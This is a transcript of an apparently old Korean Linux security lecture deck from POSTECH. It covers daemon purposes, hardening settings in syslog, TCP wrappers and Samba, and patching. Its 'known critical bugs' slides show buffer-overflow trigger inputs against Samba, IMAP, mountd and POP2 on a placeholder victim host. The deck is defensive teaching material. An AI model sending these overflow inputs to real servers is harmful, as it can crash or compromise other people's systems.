각종 데몬의 용도 (2)

Download Report

Transcript 각종 데몬의 용도 (2) 

리눅스(Linux) 보안
오태호
POSTECH Laboratory for UNIX Security
[email protected]
리눅스 보안 / 오태호
POSTECH Laboratory for UNIX Security
목차

각종 데몬의 용도
 몇 가지 보안 관련 설정
 알려진 치명적인 버그들
 버그 패치 방법
리눅스 보안 / 오태호
2
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (1)

amd ( X )


bootparamd ( X )


auto mount 데몬
오래된 Sun workstation을 network booting 할 때 사용
gated ( X )

routing 데몬
리눅스 보안 / 오태호
3
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (2)

httpd ( O )


ircd ( X )


WWW ( World Wide Web ) 데몬
irc ( Internet relay chat ) 데몬
lpd ( O )

print를 할 때 사용하는 데몬
리눅스 보안 / 오태호
4
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (3)

mcserv ( X )


named ( X )


mc ( midnight commander ) 데몬
DNS 서버
nfs ( O )

다른 Unix계열 OS와 파일공유를 할 때 사용
리눅스 보안 / 오태호
5
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (4)

portmap ( O )


routed ( X )


RPC 서비스를 제공하는데 필요
RIP을 지원하는 라우팅 데몬
sendmail ( O )

email을 받을 때 필요
리눅스 보안 / 오태호
6
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (5)

smb ( O )


snmp ( X )


MS Windows 계열 OS에서 Linux에 있는 파일이나 프린트를
사용할 때 사용
SNMP ( Simple Network Management Protocol ) 으로 네트워크
상황을 모니터링할 때 사용
squid ( X )

HTTP, FTP등의 서비스를 캐싱할 때 사용
리눅스 보안 / 오태호
7
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (6)

syslog ( O )


xntpd ( X )


시스템에서 일어나는 일들을 기록하는 데몬
시간을 정확히 맞추어 주는 데몬
inet ( O )

telnet, ftp등의 서비스를 제공해 주는 데몬
리눅스 보안 / 오태호
8
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (7)

inet







ftp ( O )
telnet ( O )
gopher ( X )
shell ( X )
login ( X )
talk / ntalk ( X )
pop-2 / pop-3 ( X )
리눅스 보안 / 오태호
9
POSTECH Laboratory for UNIX Security
각종 데몬의 용도 (8)

inet ( cont. )




imap ( X )
finger ( X )
time ( X )
auth ( X )
리눅스 보안 / 오태호
10
POSTECH Laboratory for UNIX Security
몇 가지 보안 관련 설정 (1)

/etc/syslog.conf
*.debug
*.debug
*.debug

/dev/console
@141.223.1.4
/var/log/syslog/syslog
/etc/smb.conf
hosts allow = 141.223.
리눅스 보안 / 오태호
11
POSTECH Laboratory for UNIX Security
몇 가지 보안 관련 설정 (2)

/etc/hosts.deny
ALL:ALL: spawn ((/usr/sbin/safe_finger -l @%h | /bin/mail root)&)

/etc/hosts.allow
in.telnetd: 141.223., 127.0.0.1
in.ftpd: 141.223., 127.0.0.1
portmap: 141.223., 127.0.0.1
rpc.mountd: 141.223., 127.0.0.1
rpc.nfsd: 141.223., 127.0.0.1
리눅스 보안 / 오태호
12
POSTECH Laboratory for UNIX Security
알려진 치명적인 버그들 (1)

samba ( smbd )
$ smbclient \\\\VICTIM\\IPC$ aaaaa…(3100개)…aaaaa -I victim.com
리눅스 보안 / 오태호
13
POSTECH Laboratory for UNIX Security
알려진 치명적인 버그들 (2)

bind ( named )

inverse query할 때 buffer overflow발생
리눅스 보안 / 오태호
14
POSTECH Laboratory for UNIX Security
알려진 치명적인 버그들 (3)

imap ( imapd )
$ telnet victim.com 143
Trying XXX.XXX.XXX.XXX…
Connected to victim.com.
Escape character is ‘^]’.
* OK victim.com IMAP4rev1 vXX.XXX server ready
1300 LOGIN “aaaaa…(1300개)…aaaaa” pass
$ telnet victim.com 143
Trying XXX.XXX.XXX.XXX…
Connected to victim.com.
Escape character is ‘^]’.
* OK victim.com IMAP4rev1 vXX.XXX server ready
* AUTHENTICATE {1100}
aaaaa…(1100개)…aaaaa
리눅스 보안 / 오태호
15
POSTECH Laboratory for UNIX Security
알려진 치명적인 버그들 (4)

nfs-server ( mountd )
$ mount -t nfs victim.com:aaaaa…(1000개)…aaaaa /blahblah
리눅스 보안 / 오태호
16
POSTECH Laboratory for UNIX Security
알려진 치명적인 버그들 (5)

wu-ftpd ( in.ftpd )

1024이상의 길이를 가진 directory를 만들고 지울 때 buffer
overflow발생
리눅스 보안 / 오태호
17
POSTECH Laboratory for UNIX Security
알려진 치명적인 버그들 (6)

imap ( ipop2d )
$ telnet target.com 109
Trying XXX.XXX.XXX.XXX...
Connected to target.com.
Escape character is '^]'.
+ POP2 target.com vX.XX server ready
HELO target.com:ohhara ohharapass
FOLD aaaaa...(1000개)...aaaaa
리눅스 보안 / 오태호
18
POSTECH Laboratory for UNIX Security
버그 패치 방법

패치 방법

해당 프로그램을 homepage에서 받아 온다.
 http://www.redhat.com/corp/support/errata/index.html


rpm -Uvh (package name) 을 각각 해 준다.
권장

가능하면 홈페이지에 올라오는 모든 패키지들을 주기적으로
업그레이드해 준다.
리눅스 보안 / 오태호
19
POSTECH Laboratory for UNIX Security